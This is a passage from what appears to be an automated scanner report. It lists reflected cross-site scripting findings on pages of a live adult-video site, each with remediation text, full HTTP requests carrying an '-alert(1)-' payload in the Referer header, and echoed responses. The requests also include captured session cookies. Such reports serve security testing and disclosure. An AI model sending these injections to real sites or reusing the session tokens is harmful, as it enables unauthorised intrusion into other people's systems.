Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=ff204'-alert(1)-'8fd9da9f013

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:25 GMT
Connection: close
Content-Length: 25009
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/videoslibrary.aspx&he=imlive.com&ul=/live-sex-chats/live-sex-video/&rf=http://www.google.com/search?hl=en^q=ff204'-alert(1)-'8fd9da9f013&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.224. http://imlive.com/live-sex-chats/nude-chat/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/nude-chat/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bd48'-alert(1)-'6c03af217a6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/nude-chat/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=3bd48'-alert(1)-'6c03af217a6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:40 GMT
Connection: close
Content-Length: 23212
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
avascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/keyholesexplanation.aspx&he=imlive.com&ul=/live-sex-chats/nude-chat/&rf=http://www.google.com/search?hl=en^q=3bd48'-alert(1)-'6c03af217a6&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.225. http://imlive.com/live-sex-chats/orgies/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/orgies/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2f14'-alert(1)-'1a0426053d6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/orgies/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=e2f14'-alert(1)-'1a0426053d6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:37 GMT
Connection: close
Content-Length: 49057
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
t type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/orgies/&rf=http://www.google.com/search?hl=en^q=e2f14'-alert(1)-'1a0426053d6&qs=cat=1^roomid=14&qs=cat=1^roomid=14&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

2.226. http://imlive.com/live-sex-chats/pornstars/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/pornstars/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58ae9'-alert(1)-'abc512c790d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/pornstars/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=58ae9'-alert(1)-'abc512c790d

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:47 GMT
Connection: close
Content-Length: 265847
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/pornstars/&rf=http://www.google.com/search?hl=en^q=58ae9'-alert(1)-'abc512c790d&qs=cat=1^roomid=249&qs=cat=1^roomid=249&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if (
...[SNIP]...

2.227. http://imlive.com/live-sex-chats/role-play/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/role-play/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43a6f'-alert(1)-'e56dafa5755 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/role-play/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=43a6f'-alert(1)-'e56dafa5755

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:56 GMT
Connection: close
Content-Length: 53309
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/role-play/&rf=http://www.google.com/search?hl=en^q=43a6f'-alert(1)-'e56dafa5755&qs=cat=1^roomid=-999&qs=cat=1^roomid=-999&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if
...[SNIP]...

2.228. http://imlive.com/live-sex-chats/sex-show-galleries/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-galleries/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98cde'-alert(1)-'7896e5dc643 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/sex-show-galleries/ HTTP/1.1
Ho